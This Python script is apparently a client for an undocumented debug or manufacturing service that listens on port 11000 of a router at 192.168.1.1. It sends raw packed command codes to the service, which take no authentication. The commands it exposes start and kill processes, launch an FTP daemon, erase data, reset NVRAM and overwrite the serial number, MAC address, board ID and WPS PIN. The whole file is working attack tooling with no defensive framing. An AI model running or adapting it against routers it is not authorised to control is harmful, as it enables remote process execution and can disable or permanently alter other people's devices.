#!/usr/bin/env python

# Author: DuSu

import socket
import struct
import sys

HOST = '192.168.1.1'
PORT = 11000
RISK = 'use at your own risk'

func = {
	'system_nvram_config': (4, 1, RISK),
	'system_run_process': (5, 1, 'process name'),
	'system_kill_process': (6, 1, 'arg = 1 process name, or 2 process names separated by *'),
	'burn_sku': (7, 1, RISK),
	'reboot': (8, 0, ''),
	'set_nvram_loaddefault': (9, 0, RISK),
	'burn_serial_number': (10, 1, RISK),
	'burn_board_id': (11, 1, RISK),
	'create_upgrade_file': (12, 0, RISK),
	'burn_ether_mac': (13, 1, RISK),
	'burn_wcn_pin': (14, 1, RISK),
	'print_version': (15, 0, ''),
	'abPotTime': (16, 0, ''),
	'abPotErase': (17, 0, ''),
	'abPotStop': (18, 0, ''),
	'check_usb_disk': (19, 0, ''),
	'bftpd': (20, 0, ''),
	'led_up': (21, 0, ''),
	'led_down': (22, 0, ''),
	'set_gpio': (23, 1, 'arg = 1 value, or 2 values separated by *'),
	'set_wan_led': (24, 1, 'arg = start, stop or 1'),
	'check_wps_button': (25, 0, ''),
	'check_wifi_button': (26, 0, ''),
	'check_reset_button': (27, 0, ''),
	'wlan_down': (28, 0, '')
}
lst = [
	[0, 'unsupported'],
	[1, 'unsupported'],
	[2, 'unsupported'],
	[3, 'unsupported'],
]
for key in func.keys():
	lst.append([func[key][0], key])
lst.sort()

def p32(i):
	return struct.pack("<I", i)

def usage():
	print('Usage: {} command <optional argument (max 60 chars)>'.format(sys.argv[0]))
	print('Available functions:')
	for i in range(4, len(lst)):
		key = lst[i][1]
		if func[key][1] == 0:
			if func[key][2] == '':
				print(' - {} (no argument)'.format(key))
			else:
				print(' - {} (no argument, {})'.format(key, func[key][2]))
		elif func[key][1] == 1:
			print(' - {} (1 argument: {})'.format(key, func[key][2]))
	sys.exit(0)


if len(sys.argv) < 2 or len(sys.argv) > 3:
	usage()

cmd = sys.argv[1]
try:
	(code, narg, comment) = func[cmd]
except KeyError:
	usage()

if len(sys.argv) - 2 != narg:
	usage()

if narg == 1:
	arg = sys.argv[2]
else:
	arg = ''
if len(arg) > 60:
	usage()


payload = ''
# there is a possibility to launch more than one command, but it's useless,
# since parser is forking... so set the next number to 0 or 1, here 0
payload += p32(0)
payload += p32(code)
payload += arg

s = socket.socket()
s.connect((HOST, PORT))
s.send(payload)
response = ''
buf = s.recv(4096)
while buf:
	response += buf 
	buf = s.recv(4096)
print(response)
s.close()
